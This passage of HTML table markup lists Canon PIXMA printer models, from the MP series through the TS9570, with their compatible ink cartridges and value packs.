(Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â 